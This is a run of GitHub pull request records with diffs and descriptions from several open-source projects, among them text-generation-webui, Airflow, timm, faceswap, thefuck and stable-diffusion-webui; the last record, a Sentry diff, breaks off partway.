+ yield shared.history['visible'] + [[visible_text, shared.processing_message]]
+ elif _continue:
+ last_reply = [shared.history['internal'][-1][1], shared.history['visible'][-1][1]]
+ yield shared.history['visible'][:-1] + [[visible_text, last_reply[1] + '...']]
# Generating the prompt
kwargs = {'_continue': _continue}
@@ -144,10 +155,6 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
if prompt is None:
prompt = generate_chat_prompt(text, state, **kwargs)
- # Yield *Is typing...*
- if not any((regenerate, _continue)):
- yield shared.history['visible'] + [[visible_text, shared.processing_message]]
-
# Generate
for i in range(state['chat_generation_attempts']):
reply = None
@@ -158,26 +165,26 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
reply, next_character_found = extract_message_from_reply(reply, state)
visible_reply = re.sub("(<USER>|<user>|{{user}})", state['name1'], reply)
visible_reply = apply_extensions("output", visible_reply)
+ if _continue:
+ sep = ' ' if last_reply[0][-1] not in [' ', '\n'] else ''
+ reply = last_reply[0] + sep + reply
+ sep = ' ' if last_reply[1][-1] not in [' ', '\n'] else ''
+ visible_reply = last_reply[1] + sep + visible_reply
# We need this global variable to handle the Stop event,
# otherwise gradio gets confused
if shared.stop_everything:
return shared.history['visible']
+
if just_started:
just_started = False
if not _continue:
shared.history['internal'].append(['', ''])
shared.history['visible'].append(['', ''])
- if _continue:
- sep = list(map(lambda x: ' ' if len(x) > 0 and x[-1] != ' ' else '', last_reply))
- shared.history['internal'][-1] = [text, f'{last_reply[0]}{sep[0]}{reply}']
- shared.history['visible'][-1] = [visible_text, f'{last_reply[1]}{sep[1]}{visible_reply}']
- else:
- shared.history['internal'][-1] = [text, reply]
- shared.history['visible'][-1] = [visible_text, visible_reply]
- if not shared.args.no_stream:
- yield shared.history['visible']
+ shared.history['internal'][-1] = [text, reply]
+ shared.history['visible'][-1] = [visible_text, visible_reply]
+ yield shared.history['visible']
if next_character_found:
break
@@ -188,7 +195,6 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
def impersonate_wrapper(text, state):
-
if shared.model_name == 'None' or shared.model is None:
print("No model is loaded! Select one in the Model tab.")
yield ''
@@ -202,7 +208,6 @@ def impersonate_wrapper(text, state):
# Yield *Is typing...*
yield shared.processing_message
-
for i in range(state['chat_generation_attempts']):
reply = None
for reply in generate_reply(f"{prompt}{' ' if len(cumulative_reply) > 0 else ''}{cumulative_reply}", state, eos_token=eos_token, stopping_strings=stopping_strings):
@@ -227,23 +232,16 @@ def regenerate_wrapper(text, state):
if (len(shared.history['visible']) == 1 and not shared.history['visible'][0][0]) or len(shared.history['internal']) == 0:
yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
else:
- last_visible = shared.history['visible'].pop()
- last_internal = shared.history['internal'].pop()
- # Yield '*Is typing...*'
- yield chat_html_wrapper(shared.history['visible'] + [[last_visible[0], shared.processing_message]], state['name1'], state['name2'], state['mode'])
- for history in chatbot_wrapper(last_internal[0], state, regenerate=True):
- shared.history['visible'][-1] = [last_visible[0], history[-1][1]]
- yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
+ for history in chatbot_wrapper('', state, regenerate=True):
+ yield chat_html_wrapper(history, state['name1'], state['name2'], state['mode'])
def continue_wrapper(text, state):
if (len(shared.history['visible']) == 1 and not shared.history['visible'][0][0]) or len(shared.history['internal']) == 0:
yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
else:
- # Yield ' ...'
- yield chat_html_wrapper(shared.history['visible'][:-1] + [[shared.history['visible'][-1][0], shared.history['visible'][-1][1] + ' ...']], state['name1'], state['name2'], state['mode'])
- for history in chatbot_wrapper(shared.history['internal'][-1][0], state, _continue=True):
- yield chat_html_wrapper(shared.history['visible'], state['name1'], state['name2'], state['mode'])
+ for history in chatbot_wrapper('', state, _continue=True):
+ yield chat_html_wrapper(history, state['name1'], state['name2'], state['mode'])
def remove_last_message(name1, name2, mode):
@@ -281,6 +279,7 @@ def send_dummy_reply(text, name1, name2, mode):
if len(shared.history['visible']) > 0 and not shared.history['visible'][-1][1] == '':
shared.history['visible'].append(['', ''])
shared.history['internal'].append(['', ''])
+
shared.history['visible'][-1][1] = text
shared.history['internal'][-1][1] = apply_extensions("input", text)
return chat_html_wrapper(shared.history['visible'], name1, name2, mode)
@@ -300,7 +299,6 @@ def clear_chat_log(name1, name2, greeting, mode):
# Save cleared logs
save_history(mode)
-
return chat_html_wrapper(shared.history['visible'], name1, name2, mode)
@@ -321,8 +319,8 @@ def tokenize_dialogue(dialogue, name1, name2, mode):
for i in range(len(idx) - 1):
messages.append(dialogue[idx[i]:idx[i + 1]].strip())
- messages.append(dialogue[idx[-1]:].strip())
+ messages.append(dialogue[idx[-1]:].strip())
entry = ['', '']
for i in messages:
if i.startswith(f'{name1}:'):
@@ -331,6 +329,7 @@ def tokenize_dialogue(dialogue, name1, name2, mode):
entry[1] = i[len(f'{name2}:'):].strip()
if not (len(entry[0]) == 0 and len(entry[1]) == 0):
history.append(entry)
+
entry = ['', '']
print("\033[1;32;1m\nDialogue tokenized to:\033[0;37;0m\n", end='')
@@ -339,6 +338,7 @@ def tokenize_dialogue(dialogue, name1, name2, mode):
print("\n")
for line in column.strip().split('\n'):
print("| " + line + "\n")
+
print("|\n")
print("------------------------------")
@@ -351,14 +351,17 @@ def save_history(mode, timestamp=False):
if mode == 'instruct':
if not timestamp:
return
+
fname = f"Instruct_{datetime.now().strftime('%Y%m%d-%H%M%S')}.json"
else:
if timestamp:
fname = f"{shared.character}_{datetime.now().strftime('%Y%m%d-%H%M%S')}.json"
else:
fname = f"{shared.character}_persistent.json"
+
if not Path('logs').exists():
Path('logs').mkdir()
+
with open(Path(f'logs/{fname}'), 'w', encoding='utf-8') as f:
f.write(json.dumps({'data': shared.history['internal'], 'data_visible': shared.history['visible']}, indent=2))
@@ -389,8 +392,10 @@ def build_pygmalion_style_context(data):
context = ""
if 'char_persona' in data and data['char_persona'] != '':
context += f"{data['char_name']}'s Persona: {data['char_persona']}\n"
+
if 'world_scenario' in data and data['world_scenario'] != '':
context += f"Scenario: {data['world_scenario']}\n"
+
context = f"{context.strip()}\n<START>\n"
return context
@@ -405,6 +410,7 @@ def generate_pfp_cache(character):
img = make_thumbnail(Image.open(path))
img.save(Path('cache/pfp_character.png'), format='PNG')
return img
+
return None
@@ -488,13 +494,17 @@ def upload_character(json_file, img, tavern=False):
while Path(f'characters/{outfile_name}.json').exists():
outfile_name = f'{data["char_name"]}_{i:03d}'
i += 1
+
if tavern:
outfile_name = f'TavernAI-{outfile_name}'
+
with open(Path(f'characters/{outfile_name}.json'), 'w', encoding='utf-8') as f:
f.write(json_file)
+
if img is not None:
img = Image.open(io.BytesIO(img))
img.save(Path(f'characters/{outfile_name}.png'))
+
print(f'New character saved to "characters/{outfile_name}.json".')
return outfile_name
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1509 | 2023-04-24T03:41:59Z | 2023-04-24T03:47:41Z | 2023-04-24T03:47:41Z | 2023-05-08T03:18:35Z | 3,134 | oobabooga/text-generation-webui | 26,090 | |
Add .bash extension to SSHOperator | diff --git a/airflow/providers/ssh/operators/ssh.py b/airflow/providers/ssh/operators/ssh.py
index 69deb49b2b74a..7d72fe1150867 100644
--- a/airflow/providers/ssh/operators/ssh.py
+++ b/airflow/providers/ssh/operators/ssh.py
@@ -63,7 +63,14 @@ class SSHOperator(BaseOperator):
"""
template_fields: Sequence[str] = ("command", "environment", "remote_host")
- template_ext: Sequence[str] = (".sh",)
+ template_ext: Sequence[str] = (
+ ".sh",
+ ".bash",
+ ".csh",
+ ".zsh",
+ ".dash",
+ ".ksh",
+ )
template_fields_renderers = {
"command": "bash",
"environment": "python",
| New `.bash` extension was added to `SSHOperator` into template_ext | https://api.github.com/repos/apache/airflow/pulls/28617 | 2022-12-28T07:35:31Z | 2022-12-28T15:42:22Z | 2022-12-28T15:42:22Z | 2022-12-28T15:48:42Z | 193 | apache/airflow | 14,626 |
Use `torch.repeat_interleave()` to generate repeated indices faster | diff --git a/timm/data/distributed_sampler.py b/timm/data/distributed_sampler.py
index fa403d0acc..1609018963 100644
--- a/timm/data/distributed_sampler.py
+++ b/timm/data/distributed_sampler.py
@@ -103,15 +103,16 @@ def __iter__(self):
g = torch.Generator()
g.manual_seed(self.epoch)
if self.shuffle:
- indices = torch.randperm(len(self.dataset), generator=g).tolist()
+ indices = torch.randperm(len(self.dataset), generator=g)
else:
- indices = list(range(len(self.dataset)))
+ indices = torch.arange(start=0, end=len(self.dataset))
# produce repeats e.g. [0, 0, 0, 1, 1, 1, 2, 2, 2....]
- indices = [x for x in indices for _ in range(self.num_repeats)]
+ indices = torch.repeat_interleave(indices, repeats=self.num_repeats, dim=0)
# add extra samples to make it evenly divisible
padding_size = self.total_size - len(indices)
- indices += indices[:padding_size]
+ if padding_size > 0:
+ indices = torch.cat([indices, indices[:padding_size]], dim=0)
assert len(indices) == self.total_size
# subsample per rank
@@ -125,4 +126,4 @@ def __len__(self):
return self.num_selected_samples
def set_epoch(self, epoch):
- self.epoch = epoch
\ No newline at end of file
+ self.epoch = epoch
| ## Change Log
* Use `torch.repeat_interleave()` to generate the repeated indices faster
* Add `EOF`
## Performance Benchmark
* Python 3.7
* OS : Windows 10
* CPU : i7-7700K (not overclocked)
<details>
<summary>code</summary>
```
from time import time
import numpy as np
import torch
def get_indices_v1(x, num_repeats: int = 3):
return [i for i in x for _ in range(num_repeats)]
def get_indices_v2(x, num_repeats: int = 3):
return np.repeat(x, repeats=num_repeats, axis=0).tolist()
def get_indices_v3(x, num_repeats: int = 3):
return torch.repeat_interleave(x, repeats=num_repeats, dim=0).tolist()
if __name__ == '__main__':
for num_datasets in (int(1e5), int(1e6), int(1e7)):
indices: torch.Tensor = torch.arange(start=0, end=num_datasets)
v1, v2, v3 = [], [], []
for _ in range(10):
start_time = time()
_ = get_indices_v1(indices.tolist())
end_time = time()
v1.append(end_time - start_time)
start_time = time()
_ = get_indices_v2(indices.tolist())
end_time = time()
v2.append(end_time - start_time)
start_time = time()
_ = get_indices_v3(indices)
end_time = time()
v3.append(end_time - start_time)
print(f'num_datasets {num_datasets}')
print(f'list comprehension : {np.mean(v1):.6f}s')
print(f'np.repeat : {np.mean(v2):.6f}s')
print(f'torch.repeat_interleave : {np.mean(v3):.6f}s')
print()
```
</details>
```
num_datasets 100000
list comprehension : 0.031251s
np.repeat : 0.015623s
torch.repeat_interleave : 0.009376s
num_datasets 1000000
list comprehension : 0.292203s
np.repeat : 0.132806s
torch.repeat_interleave : 0.129676s
num_datasets 10000000
list comprehension : 2.788492s
np.repeat : 1.306345s
torch.repeat_interleave : 1.042842s
``` | https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1058 | 2021-12-27T03:15:28Z | 2022-01-02T22:01:06Z | 2022-01-02T22:01:06Z | 2022-01-02T22:01:06Z | 352 | huggingface/pytorch-image-models | 16,181 |
Bump github/codeql-action from 3.22.11 to 3.23.0 | diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
index 4f0eebf29e..c03a8a7ca8 100644
--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -45,7 +45,7 @@ jobs:
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
- uses: github/codeql-action/init@b374143c1149a9115d881581d29b8390bbcbb59c # v3.22.11
+ uses: github/codeql-action/init@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v3.23.0
with:
languages: "python"
# If you wish to specify custom queries, you can do so here or in a config file.
@@ -56,7 +56,7 @@ jobs:
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
- name: Autobuild
- uses: github/codeql-action/autobuild@b374143c1149a9115d881581d29b8390bbcbb59c # v3.22.11
+ uses: github/codeql-action/autobuild@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v3.23.0
# ℹ️ Command-line programs to run using the OS shell.
# 📚 https://git.io/JvXDl
@@ -70,4 +70,4 @@ jobs:
# make release
- name: Perform CodeQL Analysis
- uses: github/codeql-action/analyze@b374143c1149a9115d881581d29b8390bbcbb59c # v3.22.11
+ uses: github/codeql-action/analyze@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118 # v3.23.0
| Bumps [github/codeql-action](https://github.com/github/codeql-action) from 3.22.11 to 3.23.0.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/github/codeql-action/blob/main/CHANGELOG.md">github/codeql-action's changelog</a>.</em></p>
<blockquote>
<h1>CodeQL Action Changelog</h1>
<p>See the <a href="https://github.com/github/codeql-action/releases">releases page</a> for the relevant changes to the CodeQL CLI and language packs.</p>
<p>Note that the only difference between <code>v2</code> and <code>v3</code> of the CodeQL Action is the node version they support, with <code>v3</code> running on node 20 while we continue to release <code>v2</code> to support running on node 16. For example <code>3.22.11</code> was the first <code>v3</code> release and is functionally identical to <code>2.22.11</code>. This approach ensures an easy way to track exactly which features are included in different versions, indicated by the minor and patch version numbers.</p>
<h2>[UNRELEASED]</h2>
<p>No user facing changes.</p>
<h2>3.23.0 - 08 Jan 2024</h2>
<ul>
<li>We are rolling out a feature in January 2024 that will disable Python dependency installation by default for all users. This improves the speed of analysis while having only a very minor impact on results. You can override this behavior by setting <code>CODEQL_ACTION_DISABLE_PYTHON_DEPENDENCY_INSTALLATION=false</code> in your workflow, however we plan to remove this ability in future versions of the CodeQL Action. <a href="https://redirect.github.com/github/codeql-action/pull/2031">#2031</a></li>
<li>The CodeQL Action now requires CodeQL version 2.11.6 or later. For more information, see <a href="https://github.com/github/codeql-action/blob/main/#2227---16-nov-2023">the corresponding changelog entry for CodeQL Action version 2.22.7</a>. <a href="https://redirect.github.com/github/codeql-action/pull/2009">#2009</a></li>
</ul>
<h2>3.22.12 - 22 Dec 2023</h2>
<ul>
<li>Update default CodeQL bundle version to 2.15.5. <a href="https://redirect.github.com/github/codeql-action/pull/2047">#2047</a></li>
</ul>
<h2>3.22.11 - 13 Dec 2023</h2>
<ul>
<li>[v3+ only] The CodeQL Action now runs on Node.js v20. <a href="https://redirect.github.com/github/codeql-action/pull/2006">#2006</a></li>
</ul>
<h2>2.22.10 - 12 Dec 2023</h2>
<ul>
<li>Update default CodeQL bundle version to 2.15.4. <a href="https://redirect.github.com/github/codeql-action/pull/2016">#2016</a></li>
</ul>
<h2>2.22.9 - 07 Dec 2023</h2>
<p>No user facing changes.</p>
<h2>2.22.8 - 23 Nov 2023</h2>
<ul>
<li>Update default CodeQL bundle version to 2.15.3. <a href="https://redirect.github.com/github/codeql-action/pull/2001">#2001</a></li>
</ul>
<h2>2.22.7 - 16 Nov 2023</h2>
<ul>
<li>Add a deprecation warning for customers using CodeQL version 2.11.5 and earlier. These versions of CodeQL were discontinued on 8 November 2023 alongside GitHub Enterprise Server 3.7, and will be unsupported by CodeQL Action v2.23.0 and later. <a href="https://redirect.github.com/github/codeql-action/pull/1993">#1993</a>
<ul>
<li>If you are using one of these versions, please update to CodeQL CLI version 2.11.6 or later. For instance, if you have specified a custom version of the CLI using the 'tools' input to the 'init' Action, you can remove this input to use the default version.</li>
<li>Alternatively, if you want to continue using a version of the CodeQL CLI between 2.10.5 and 2.11.5, you can replace <code>github/codeql-action/*@v2</code> by <code>github/codeql-action/*@v2.22.7</code> in your code scanning workflow to ensure you continue using this version of the CodeQL Action.</li>
</ul>
</li>
</ul>
<h2>2.22.6 - 14 Nov 2023</h2>
<ul>
<li>Customers running Python analysis on macOS using version 2.14.6 or earlier of the CodeQL CLI should upgrade to CodeQL CLI version 2.15.0 or later. If you do not wish to upgrade the CodeQL CLI, ensure that you are using Python version 3.11 or earlier, as CodeQL version 2.14.6 and earlier do not support Python 3.12. You can achieve this by adding a <a href="https://github.com/actions/setup-python"><code>setup-python</code></a> step to your code scanning workflow before the step that invokes <code>github/codeql-action/init</code>.</li>
<li>Update default CodeQL bundle version to 2.15.2. <a href="https://redirect.github.com/github/codeql-action/pull/1978">#1978</a></li>
</ul>
<h2>2.22.5 - 27 Oct 2023</h2>
<p>No user facing changes.</p>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/github/codeql-action/commit/e5f05b81d5b6ff8cfa111c80c22c5fd02a384118"><code>e5f05b8</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2066">#2066</a> from github/update-v3.23.0-fd55bb0b0</li>
<li><a href="https://github.com/github/codeql-action/commit/48e7b8b751b457ccde050d587c85ce3defc30555"><code>48e7b8b</code></a> Update changelog for v3.23.0</li>
<li><a href="https://github.com/github/codeql-action/commit/fd55bb0b00b5802fdceb93f76b498f105e0edbe1"><code>fd55bb0</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2065">#2065</a> from github/henrymercer/further-run-queries-cleanup</li>
<li><a href="https://github.com/github/codeql-action/commit/838a0229829cd641a4a60fc3c95e12a673b5fcdb"><code>838a022</code></a> Clean up running queries workflow now that the queries are determined by the CLI</li>
<li><a href="https://github.com/github/codeql-action/commit/8516954d603e47049b34f3da4dfac83009fcd450"><code>8516954</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2062">#2062</a> from github/henrymercer/remove-action-config-parsing</li>
<li><a href="https://github.com/github/codeql-action/commit/a533ec62b3aeb59c7467569705b9edaca021df43"><code>a533ec6</code></a> Merge branch 'main' into henrymercer/remove-action-config-parsing</li>
<li><a href="https://github.com/github/codeql-action/commit/08ae9bf4d0d441bd9dcf6c2d80742c9fd2bf3cf0"><code>08ae9bf</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2063">#2063</a> from github/henrymercer/remove-ml-powered-queries-repo</li>
<li><a href="https://github.com/github/codeql-action/commit/58ff74adc38e087ca7f6670dfe24cd319aea5f11"><code>58ff74a</code></a> Merge pull request <a href="https://redirect.github.com/github/codeql-action/issues/2031">#2031</a> from github/rasmuswl/no-dep-inst-default</li>
<li><a href="https://github.com/github/codeql-action/commit/9926570d4c48228ba780bd02a18a4e05dbb1bbe7"><code>9926570</code></a> Generate JS</li>
<li><a href="https://github.com/github/codeql-action/commit/2e27b3c56bdb1864f5dd58da25fee61f6cd7bb81"><code>2e27b3c</code></a> Create helper <code>isPythonDependencyInstallationDisabled</code></li>
<li>Additional commits viewable in <a href="https://github.com/github/codeql-action/compare/b374143c1149a9115d881581d29b8390bbcbb59c...e5f05b81d5b6ff8cfa111c80c22c5fd02a384118">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/psf/requests/pulls/6619 | 2024-01-08T17:01:38Z | 2024-01-08T17:56:01Z | 2024-01-08T17:56:01Z | 2024-01-08T17:56:02Z | 503 | psf/requests | 32,444 |
fix: specific TensorFlow version to the latest 1.x(1.13.1) since it is incompatible with TensorFlow 2.x API | diff --git a/Dockerfile.cpu b/Dockerfile.cpu
index 3ddabd49e0..7bfa5d4cab 100755
--- a/Dockerfile.cpu
+++ b/Dockerfile.cpu
@@ -1,4 +1,4 @@
-FROM tensorflow/tensorflow:latest-py3
+FROM tensorflow/tensorflow:1.12.0-py3
RUN apt-get update -qq -y \
&& apt-get install -y libsm6 libxrender1 libxext-dev python3-tk\
diff --git a/Dockerfile.gpu b/Dockerfile.gpu
index 94f64c0a76..5a8a8c320b 100755
--- a/Dockerfile.gpu
+++ b/Dockerfile.gpu
@@ -1,4 +1,4 @@
-FROM tensorflow/tensorflow:latest-gpu-py3
+FROM tensorflow/tensorflow:1.12.0-gpu-py3
RUN apt-get update -qq -y \
&& apt-get install -y libsm6 libxrender1 libxext-dev python3-tk\
| Docker tensorflow/tensorflow:latest-gpu-py3 and tensorflow/tensorflow:latest-py3 has linked to TensorFLow 2.0.0a0 which leads to faceswap run into crash. | https://api.github.com/repos/deepfakes/faceswap/pulls/675 | 2019-03-20T02:59:37Z | 2019-03-21T15:55:15Z | 2019-03-21T15:55:15Z | 2019-03-21T15:55:16Z | 243 | deepfakes/faceswap | 18,774 |
Limit concurrency of our test workflow | diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 17d03d3eef..dfd6a8e381 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -1,4 +1,7 @@
name: Tests
+concurrency:
+ group: ${{ github.head_ref || github.run_id }}
+ cancel-in-progress: true
on:
push:
| This seems to be useful to reduce our CI times (e.g pushing 2 commits one after another would block the last commit, since the workflows would be allocated by the first commit. This is making the second cancel the first). See [see the documentation](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#example-using-a-fallback-value) for more details. | https://api.github.com/repos/httpie/cli/pulls/1353 | 2022-04-14T08:49:36Z | 2022-04-14T14:38:28Z | 2022-04-14T14:38:28Z | 2022-04-14T14:38:28Z | 102 | httpie/cli | 34,062 |
Updated the sendEmail function parameter typo | diff --git a/JARVIS/JARVIS.py b/JARVIS/JARVIS.py
index e16d242097..306ce10160 100644
--- a/JARVIS/JARVIS.py
+++ b/JARVIS/JARVIS.py
@@ -49,7 +49,7 @@ def speak_news():
speak('These were the top headlines, Have a nice day Sir!!..')
-def sendEmail(do, content):
+def sendEmail(to, content):
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
| https://api.github.com/repos/geekcomputers/Python/pulls/1264 | 2021-01-02T10:09:38Z | 2021-01-02T17:07:13Z | 2021-01-02T17:07:13Z | 2021-01-02T17:07:13Z | 130 | geekcomputers/Python | 31,417 | |
#N/A: Use git_branch_exists rule with `checkout` too | diff --git a/tests/rules/test_git_branch_exists.py b/tests/rules/test_git_branch_exists.py
index b41b0a413..e2122320e 100644
--- a/tests/rules/test_git_branch_exists.py
+++ b/tests/rules/test_git_branch_exists.py
@@ -12,22 +12,23 @@ def stderr(branch_name):
def new_command(branch_name):
return [cmd.format(branch_name) for cmd in [
'git branch -d {0} && git branch {0}',
- 'git branch -D {0} && git branch {0}', 'git checkout {0}']]
+ 'git branch -d {0} && git checkout -b {0}',
+ 'git branch -D {0} && git branch {0}',
+ 'git branch -D {0} && git checkout -b {0}', 'git checkout {0}']]
@pytest.mark.parametrize('script, branch_name', [
- ('git branch foo', 'foo'),
- ('git branch bar', 'bar')])
+ ('git branch foo', 'foo'), ('git checkout bar', 'bar')])
def test_match(stderr, script, branch_name):
assert match(Command(script=script, stderr=stderr))
-@pytest.mark.parametrize('script', ['git branch foo', 'git branch bar'])
+@pytest.mark.parametrize('script', ['git branch foo', 'git checkout bar'])
def test_not_match(script):
assert not match(Command(script=script, stderr=''))
@pytest.mark.parametrize('script, branch_name, ', [
- ('git branch foo', 'foo'), ('git branch bar', 'bar')])
+ ('git branch foo', 'foo'), ('git checkout bar', 'bar')])
def test_get_new_command(stderr, new_command, script, branch_name):
assert get_new_command(Command(script=script, stderr=stderr)) == new_command
diff --git a/thefuck/rules/git_branch_exists.py b/thefuck/rules/git_branch_exists.py
index a2c007888..25b7e5060 100644
--- a/thefuck/rules/git_branch_exists.py
+++ b/thefuck/rules/git_branch_exists.py
@@ -6,8 +6,7 @@
@git_support
def match(command):
- return ('branch' in command.script
- and "fatal: A branch named '" in command.stderr
+ return ("fatal: A branch named '" in command.stderr
and " already exists." in command.stderr)
@@ -17,7 +16,9 @@ def get_new_command(command):
branch_name = re.findall(
r"fatal: A branch named '([^']*)' already exists.", command.stderr)[0]
new_command_templates = [['git branch -d {0}', 'git branch {0}'],
+ ['git branch -d {0}', 'git checkout -b {0}'],
['git branch -D {0}', 'git branch {0}'],
+ ['git branch -D {0}', 'git checkout -b {0}'],
['git checkout {0}']]
for new_command_template in new_command_templates:
yield shell.and_(*new_command_template).format(branch_name)
| What it solves and how: 
Please review and comment.
| https://api.github.com/repos/nvbn/thefuck/pulls/530 | 2016-07-21T18:00:24Z | 2016-07-22T10:11:05Z | 2016-07-22T10:11:05Z | 2016-08-11T02:24:09Z | 676 | nvbn/thefuck | 30,706 |
Fixed filename patterns sanitizing | diff --git a/modules/images.py b/modules/images.py
index 530a8440b96..d17072632f1 100644
--- a/modules/images.py
+++ b/modules/images.py
@@ -245,34 +245,42 @@ def resize_image(resize_mode, im, width, height):
invalid_filename_chars = '<>:"/\\|?*\n'
+invalid_filename_prefix = ' '
+invalid_filename_postfix = ' .'
re_nonletters = re.compile(r'[\s'+string.punctuation+']+')
+max_filename_part_length = 128
+max_prompt_words = 8
def sanitize_filename_part(text, replace_spaces=True):
if replace_spaces:
text = text.replace(' ', '_')
- return text.translate({ord(x): '_' for x in invalid_filename_chars})[:128]
+ text = text.translate({ord(x): '_' for x in invalid_filename_chars})
+ text = text.lstrip(invalid_filename_prefix)[:max_filename_part_length]
+ text = text.rstrip(invalid_filename_postfix)
+ return text
def apply_filename_pattern(x, p, seed, prompt):
if seed is not None:
x = x.replace("[seed]", str(seed))
+
if prompt is not None:
- x = x.replace("[prompt]", sanitize_filename_part(prompt)[:128])
- x = x.replace("[prompt_spaces]", sanitize_filename_part(prompt, replace_spaces=False)[:128])
+ x = x.replace("[prompt]", sanitize_filename_part(prompt))
+ x = x.replace("[prompt_spaces]", sanitize_filename_part(prompt, replace_spaces=False))
if "[prompt_words]" in x:
words = [x for x in re_nonletters.split(prompt or "") if len(x) > 0]
if len(words) == 0:
words = ["empty"]
+ x = x.replace("[prompt_words]", sanitize_filename_part(" ".join(words[0:max_prompt_words]), replace_spaces=False))
- x = x.replace("[prompt_words]", " ".join(words[0:8]).strip())
if p is not None:
x = x.replace("[steps]", str(p.steps))
x = x.replace("[cfg]", str(p.cfg_scale))
x = x.replace("[width]", str(p.width))
x = x.replace("[height]", str(p.height))
- x = x.replace("[sampler]", sd_samplers.samplers[p.sampler_index].name)
+ x = x.replace("[sampler]", sanitize_filename_part(sd_samplers.samplers[p.sampler_index].name, replace_spaces=False))
x = x.replace("[model_hash]", shared.sd_model.sd_model_hash)
x = x.replace("[date]", datetime.date.today().isoformat())
| The following file patterns are invalid on Windows.
- Begin or end with the ASCII Space (0x20)
- End with the ASCII Period (0x2E)
For example, if `[prompt_spaces]` is specified as the directory name pattern, sometimes file saving may fail. | https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/743 | 2022-09-20T06:21:49Z | 2022-09-20T06:46:45Z | 2022-09-20T06:46:45Z | 2022-09-20T06:48:22Z | 577 | AUTOMATIC1111/stable-diffusion-webui | 40,632 |
Add seaborn | diff --git a/README.md b/README.md
index fcf7c395b..dd0e8393f 100644
--- a/README.md
+++ b/README.md
@@ -980,6 +980,7 @@ Inspired by [awesome-php](https://github.com/ziadoz/awesome-php).
* [pygraphviz](https://pypi.python.org/pypi/pygraphviz) - Python interface to [Graphviz](http://www.graphviz.org/).
* [PyQtGraph](http://www.pyqtgraph.org/) - Interactive and realtime 2D/3D/Image plotting and science/engineering widgets.
* [SnakeViz](http://jiffyclub.github.io/snakeviz/) - A browser based graphical viewer for the output of Python's cProfile module.
+* [seaborn](https://github.com/mwaskom/seaborn) - Statistical data visualization using matplotlib.
* [vincent](https://github.com/wrobstory/vincent) - A Python to Vega translator.
* [VisPy](http://vispy.org/) - High-performance scientific visualization based on OpenGL.
| ## What is this Python project?
Seaborn is a Python visualization library based on matplotlib. It provides a high-level interface for drawing attractive statistical graphics.
## What's the difference between this Python project and similar ones?
- Several built-in themes that improve on the default matplotlib aesthetics
- Tools for choosing color palettes to make beautiful plots that reveal patterns in your data
- Functions for visualizing univariate and bivariate distributions or for comparing them between subsets of data
- Tools that fit and visualize linear regression models for different kinds of independent and dependent variables
- Functions that visualize matrices of data and use clustering algorithms to discover structure in those matrices
- A function to plot statistical timeseries data with flexible estimation and representation of uncertainty around the estimate
- High-level abstractions for structuring grids of plots that let you easily build complex visualizations
Anyone who agrees with this pull request could vote for it by adding a :+1: to it, and usually, the maintainer will merge it when votes reach **20**.
| https://api.github.com/repos/vinta/awesome-python/pulls/713 | 2016-08-28T12:26:03Z | 2016-09-13T06:36:56Z | 2016-09-13T06:36:56Z | 2016-09-13T06:36:56Z | 241 | vinta/awesome-python | 27,038 |
ref: Remove "eventstore.use-nodestore" feature switch | diff --git a/src/sentry/api/endpoints/event_apple_crash_report.py b/src/sentry/api/endpoints/event_apple_crash_report.py
index eb79bd595a4f0e..15131841ab3ebf 100644
--- a/src/sentry/api/endpoints/event_apple_crash_report.py
+++ b/src/sentry/api/endpoints/event_apple_crash_report.py
@@ -4,7 +4,7 @@
from django.http import HttpResponse, StreamingHttpResponse
